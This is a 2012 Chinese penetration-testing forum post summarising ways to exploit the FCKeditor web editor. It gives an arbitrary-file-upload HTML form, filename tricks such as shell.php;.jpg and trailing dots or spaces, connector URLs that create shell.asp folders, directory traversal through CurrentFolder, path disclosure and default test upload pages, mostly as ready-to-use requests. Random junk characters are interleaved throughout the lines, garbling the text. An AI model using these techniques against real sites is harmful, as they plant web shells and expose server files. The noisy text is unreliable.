中国网络渗透测试联盟

标题: FCKeditor漏洞利用总结 [打印本页]

作者: 荒村狂客    时间: 2012-9-5 20:23
标题: FCKeditor漏洞利用总结
Fckeditor漏洞利用总结

查看编辑器版本4 w  k% z9 n* m' d/ E& A  n
FCKeditor/_whatsnew.html8 q$ y1 w3 k2 u" ~& `# U) J
—————————————————————————————————————————————————————————————

2. Version 2.2 版本
7 W7 u9 ?& y9 B1 N. ]! MApache+linux 环境下在上传文件后面加个.突破!测试通过。
8 `0 ~: @, \9 R. M0 `& K—————————————————————————————————————————————————————————————

3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。" b/ T$ ~! q/ ^9 p$ c/ H! j
<form id="frmUpload" enctype="multipart/form-data": b- Q( O  |0 d9 t& F& k3 D
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>9 E; [; a5 s+ r) n
<input type="file" name="NewFile" size="50"><br>
( W6 a3 w+ B2 |- w- |; k) H/ A4 r8 y& J<input id="btnUpload" type="submit" value="Upload">
$ H5 X# |; @3 w4 a2 D  u</form>
  q% y; y3 s1 T) d. w# C6 x—————————————————————————————————————————————————————————————

4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
# H7 B' [$ x& q1 x' K' s        很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
" y" M- n, y( t- I, _    4.1:提交shell.php+空格绕过
" _' [+ z$ \9 p不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
. s7 ^% \3 S) K4 p$ M8 ]! o% J1 y    4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。# W" S1 z$ p: X0 R
—————————————————————————————————————————————————————————————

5. 突破建立文件夹
8 ~' X, i' e$ M; u0 j- A7 J) t4 `FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
, x+ G" T0 H/ ~  KFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp% W; l0 l' c- \! A
—————————————————————————————————————————————————————————————

6. FCKeditor 中test 文件的上传地址
" t, p& ?) L; M$ W$ b7 VFCKeditor/editor/filemanager/browser/default/connectors/test.html
) c5 X0 H, C- OFCKeditor/editor/filemanager/upload/test.html; M4 E, m) O9 P! D( `( ^
FCKeditor/editor/filemanager/connectors/test.html
7 a! {0 ~" _( N( P" C4 Y( w2 u; L! CFCKeditor/editor/filemanager/connectors/uploadtest.html3 t5 v& P8 \- R) \8 M
—————————————————————————————————————————————————————————————
6 j. D# O. V$ k+ S6 \

7.常用上传地址
1 v  X: p& {- D+ U/ P  FFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
4 Q( @* ~# \! t5 S) g% J$ OFCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp/ j4 z2 y2 R. [4 {5 T
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
# Y6 w1 s9 z: kJSP 版:
+ U7 P7 }& o: [7 I: B! QFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp9 K/ ?6 m$ U+ a6 C/ e" ^
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文9 N  V7 K; k7 @+ l$ q1 G
件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。
7 [" Q3 D$ {5 |: `—————————————————————————————————————————————————————————————

8.其他上传地址/ q& k( _2 j3 C" f- b! R$ O( [5 |
FCKeditor/_samples/default.html" S5 a6 @+ x; j
FCKeditor/_samples/asp/sample01.asp8 u6 C0 u) _$ i3 i8 R4 t2 F1 J7 ^  F
FCKeditor/_samples/asp/sample02.asp
2 d5 W: W# H! p9 e" xFCKeditor/_samples/asp/sample03.asp9 Y7 h1 Z+ P& N
FCKeditor/_samples/asp/sample04.asp
) z% U% D& u' w  H: R一般很多站点都已删除_samples 目录,可以试试。/ m8 V8 g; Q, M
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
. m* a! d. v: R# ~5 o: t—————————————————————————————————————————————————————————————

9.列目录漏洞也可助找上传地址
& l" J" e0 W+ s& m! a7 X# u9 }& ]5 SVersion 2.4.1 测试通过
& {& @0 ^5 Q9 {$ V8 K/ E5 x7 ]修改CurrentFolder 参数使用 ../../来进入不同的目录' s  ~( w! @( ^+ h1 s( C
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp. B6 U8 N' u& T/ A
根据返回的XML 信息可以查看网站所有的目录。& C: S1 Q6 G' u# Y5 S, _
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F# N2 F+ j: K, B
也可以直接浏览盘符:& ^4 J; P2 o2 c# }
JSP 版本:& c0 s4 ~! N+ b( J2 U( Y; p
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
7 l, Z: v, n4 ?$ O8 a—————————————————————————————————————————————————————————————

10.爆路径漏洞
# T4 d  j  z2 T# s" f# G5 gFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
% Z4 q0 I$ q2 W2 ]6 E—————————————————————————————————————————————————————————————

11. FCKeditor 被动限制策略所导致的过滤不严问题
) P  \1 y7 f! r# Y( d0 x4 }        影响版本: FCKeditor x.x <= FCKeditor v2.4.3- x* S; o9 r7 D! E( k
脆弱描述:5 c1 c2 K( A4 G# M
FCKeditor v2.4.3 中File 类别默认拒绝上传类型:# f' A2 U2 m0 z! m' V
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm" U, d8 [9 i+ N" I3 J
Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
/ s' H3 p( z# F  H5 X        而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。" ~' D5 j0 Z& |$ ^) Z/ x: G4 U
        在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!


作者: admin    时间: 2012-9-8 22:43
[attach]41[/attach]




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2